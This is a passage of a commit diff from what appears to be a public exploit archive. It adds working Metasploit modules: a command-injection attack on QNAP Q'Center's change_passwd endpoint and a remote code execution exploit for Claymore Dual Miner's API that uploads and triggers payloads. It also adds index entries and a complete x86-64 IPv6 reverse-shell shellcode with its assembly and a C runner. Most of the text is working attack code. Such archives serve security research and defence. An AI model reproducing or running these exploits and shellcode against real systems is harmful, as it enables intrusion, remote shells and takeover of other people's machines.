'uri' => normalize_uri(target_uri.path, '/hawkeye/v1/account'),
'query' => 'change_passwd',
'cookie' => @cookie,
'ctype' => 'application/json',
'data' => vars_post.to_json
}, 5)
end
def execute_command(cmd, _opts)
change_passwd @id, @pw, "\";#{cmd};\""
end
def exploit
unless [CheckCode::Detected, CheckCode::Appears].include? check
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
login datastore['USERNAME'], datastore['PASSWORD']
if datastore['USERNAME'].eql? 'admin'
@id = @cookie.scan(/_ID=(.+?);/).flatten.first
@pw = datastore['PASSWORD']
else
privesc
end
print_status 'Sending payload ...'
execute_cmdstager linemax: 10_000
end
end

185
exploits/multiple/remote/45044.rb Executable file
View file

@ -0,0 +1,185 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'Nanopool Claymore Dual Miner APIs RCE',
'Description' => %q{
This module takes advantage of miner remote manager APIs to exploit an RCE vulnerability.
},
'Author' =>
[
'reversebrain@snado', # Vulnerability reporter
'phra@snado' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB', '44638'],
['CVE', '2018-1000049'],
['URL', 'https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/']
],
'Platform' => ['win', 'linux'],
'Targets' =>
[
[ 'Automatic Target', { 'auto' => true }],
[ 'Linux',
{
'Platform' => 'linux',
'Arch' => ARCH_X64,
'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf' ]
}
],
[ 'Windows',
{
'Platform' => 'windows',
'Arch' => ARCH_X64,
'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
}
]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DisclosureDate' => 'Feb 09 2018',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('RPORT', [ true, 'Set miner port', 3333 ])
])
deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST')
end
def select_target
data = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_getfile',
"params" => ['config.txt']
}.to_json
connect
sock.put(data)
buf = sock.get_once || ''
tmp = StringIO.new
tmp << buf
tmp2 = tmp.string
hex = ''
if tmp2.scan(/\w+/)[7]
return self.targets[2]
elsif tmp2.scan(/\w+/)[5]
return self.targets[1]
else
return nil
end
end
def check
target = select_target
if target.nil?
return Exploit::CheckCode::Safe
end
data = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_getfile',
"params" => ['config.txt']
}.to_json
connect
sock.put(data)
buf = sock.get_once || ''
tmp = StringIO.new
tmp << buf
tmp2 = tmp.string
hex = ''
case target['Platform']
when 'linux'
hex = tmp2.scan(/\w+/)[5]
when 'windows'
hex = tmp2.scan(/\w+/)[7]
end
str = Rex::Text.hex_to_raw(hex)
if str.include?('WARNING')
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Detected
end
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
ensure
disconnect
end
def execute_command(cmd, opts = {})
target = select_target
case target['Platform']
when 'linux'
cmd = Rex::Text.to_hex(cmd, '')
upload = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_file',
"params" => ['reboot.bash', "#{cmd}"]
}.to_json
when 'windows'
cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
upload = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_file',
"params" => ['reboot.bat', "#{cmd}"]
}.to_json
end
connect
sock.put(upload)
buf = sock.get_once || ''
trigger_vulnerability
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
fail_with(Failure::UnexpectedReply, e.message)
ensure
disconnect
end
def trigger_vulnerability
execute = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_reboot'
}.to_json
connect
sock.put(execute)
buf = sock.get_once || ''
disconnect
end
def exploit
target = select_target
if target.nil?
fail_with(Failure::NoTarget, 'No matching target')
end
if (target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||
(target['Platform'].eql?('windows') && payload_instance.name !~ /windows/i)
fail_with(Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'")
end
case target['Platform']
when 'linux'
execute_cmdstager(flavor: :echo, linemax: 100000)
when 'windows'
execute_cmdstager(flavor: :vbs, linemax: 100000)
end
end
end

11
files_exploits.csv
View file

@ -6018,7 +6018,7 @@ id,file,description,date,author,type,platform,port
45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows,
45017,exploits/windows/dos/45017.html,"G DATA Total Security 25.4.0.3 - Activex Buffer Overflow",2018-07-13,"Filipe Xavier Oliveira",dos,windows,
45032,exploits/multiple/dos/45032.txt,"macOS/iOS - JavaScript Injection Bug in OfficeImporter",2018-07-16,"Google Security Research",dos,multiple,
45033,exploits/linux/dos/45033.c,"Linux/Ubuntu - Other Users coredumps can be read via setgid Directory and killpriv Bypass",2018-07-16,"Google Security Research",dos,linux,
45033,exploits/linux/dos/45033.c,"Linux (Ubuntu) - Other Users coredumps Can Be Read via setgid Directory and killpriv Bypass",2018-07-16,"Google Security Research",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9817,6 +9817,7 @@ id,file,description,date,author,type,platform,port
45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
45026,exploits/windows/local/45026.txt,"Microsoft Enterprise Mode Site List Manager - XML External Entity Injection",2018-07-16,hyp3rlinx,local,windows,
45041,exploits/hardware/local/45041.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Restricted Shell Escape",2018-07-17,LiquidWorm,local,hardware,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16622,6 +16623,9 @@ id,file,description,date,author,type,platform,port
45019,exploits/linux/remote/45019.rb,"Apache CouchDB - Arbitrary Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,5984
45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80
45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
45040,exploits/hardware/remote/45040.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials",2018-07-17,LiquidWorm,remote,hardware,
45043,exploits/linux/remote/45043.rb,"QNAP Q'Center - change_passwd Command Execution (Metasploit)",2018-07-17,Metasploit,remote,linux,443
45044,exploits/multiple/remote/45044.rb,"Nanopool Claymore Dual Miner - APIs RCE (Metasploit)",2018-07-17,Metasploit,remote,multiple,3333
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39666,3 +39670,8 @@ id,file,description,date,author,type,platform,port
45022,exploits/hardware/webapps/45022.txt,"Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery",2018-07-13,t4rkd3vilz,webapps,hardware,
45027,exploits/java/webapps/45027.txt,"Fortify Software Security Center (SSC) 17.x/18.1 - XML External Entity Injection",2018-07-16,alt3kx,webapps,java,
45031,exploits/php/webapps/45031.txt,"WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting",2018-07-16,"Berk Dusunur",webapps,php,
45034,exploits/hardware/webapps/45034.html,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Cross-Site Request Forgery",2018-07-17,LiquidWorm,webapps,hardware,80
45035,exploits/hardware/webapps/45035.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service",2018-07-17,LiquidWorm,webapps,hardware,
45036,exploits/hardware/webapps/45036.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download",2018-07-17,LiquidWorm,webapps,hardware,
45037,exploits/hardware/webapps/45037.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation",2018-07-17,LiquidWorm,webapps,hardware,
45038,exploits/hardware/webapps/45038.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root",2018-07-17,LiquidWorm,webapps,hardware,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -895,3 +895,4 @@ id,file,description,date,author,type,platform
44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86
45029,shellcodes/arm/45029.c,"Linux/ARM - Bind (1234/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2018-07-16,odzhancode,shellcode,arm
45039,shellcodes/linux_x86-64/45039.c,"Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes)",2018-07-17,"Hashim Jawad",shellcode,linux_x86-64

1 id file description date author type platform
895 44963 shellcodes/linux_x86/44963.c Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes) 2018-07-02 Anurag Srivastava shellcode linux_x86
896 44990 shellcodes/linux_x86/44990.c Linux/x86 - Kill Process Shellcode (20 bytes) 2018-07-09 Nathu Nandwani shellcode linux_x86
897 45029 shellcodes/arm/45029.c Linux/ARM - Bind (1234/TCP) Shell (/bin/sh) Shellcode (104 bytes) 2018-07-16 odzhancode shellcode arm
898 45039 shellcodes/linux_x86-64/45039.c Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes) 2018-07-17 Hashim Jawad shellcode linux_x86-64

115
shellcodes/linux_x86-64/45039.c Normal file
View file

@ -0,0 +1,115 @@
/*
; Title : Reverse Shell (IPv6) with Password - Shellcode
; Author : Hashim Jawad @ihack4falafel
; OS : Linux kali 4.15.0-kali2-amd64 #1 SMP Debian 4.15.11-1kali1 (2018-03-21) x86_64 GNU/Linux
; Arch : x86_64
; Size : 115 bytes
section .text
global _start
_start:
; int socket(int domain, int type, int protocol)
; rax=41, rdi=10, rsi=1, rdx=0
xor esi,esi
mul esi
inc esi
push 10
pop rdi
add al, 41
syscall
; save socket fd in rdi
xchg rbx,rax
; struct sockaddr_in6 struct
push rdx ; scope id = 0
mov rcx,0xFEFFFFFFFFFFFFFF ; link local address ::1
not rcx
push rcx
push rdx
push rdx ; sin6_flowinfo=0
push word 0x3905 ; port 1337
push word 10 ; sin6_family
; int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen)
; rax=42, rdi=rbx(fd), rsi=sockaddr_inet6, rdx=28 (length)
push rbx
pop rdi
push rsp
pop rsi
push 28
pop rdx
push 42
pop rax
syscall
; dup2 (new, old)
; rax=33, rdi=new fd, rsi=0,1,2 (stdin, stdout, stderr)
xchg rsi, rax
push 0x3
pop rsi
_loop:
push 0x21
pop rax
dec esi
syscall
loopnz _loop
; read (int fd, void *bf, size_t count)
; rax=0, rdi=0 (stdin), rsi=rsp, rdx=4 (pwnd)
xor rax, rax
push rax
pop rdi
push rax
push rsp
pop rsi
push 0x4
pop rdx
syscall
; check passcode (pwnd)
push 0x646e7770
pop rbx
cmp dword [rsi], ebx
jne _nop
; int execve(cont char *filename, char *const argv[], char *const envp[])
; rax=59, rdi=/bin//sh, rsi=0, rdx=0
xor rax, rax
push rax
mov rbx, 0x68732f2f6e69622f
push rbx
push rsp
pop rdi
push rax
push rsp
pop rsi
cdq
push 0x3b
pop rax
syscall
_nop:
nop
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xf6\xf7\xe6\xff\xc6\x6a\x0a\x5f\x04\x29\x0f\x05\x48\x93\x52\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xfe\x48\xf7\xd1\x51\x52\x52\x66\x68\x05\x39\x66\x6a\x0a\x53\x5f\x54\x5e\x6a\x1c\x5a\x6a\x2a\x58\x0f\x05\x48\x96\x6a\x03\x5e\x6a\x21\x58\xff\xce\x0f\x05\xe0\xf7\x48\x31\xc0\x50\x5f\x50\x54\x5e\x6a\x04\x5a\x0f\x05\x68\x70\x77\x6e\x64\x5b\x39\x1e\x75\x1a\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x50\x54\x5e\x99\x6a\x3b\x58\x0f\x05\x90";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}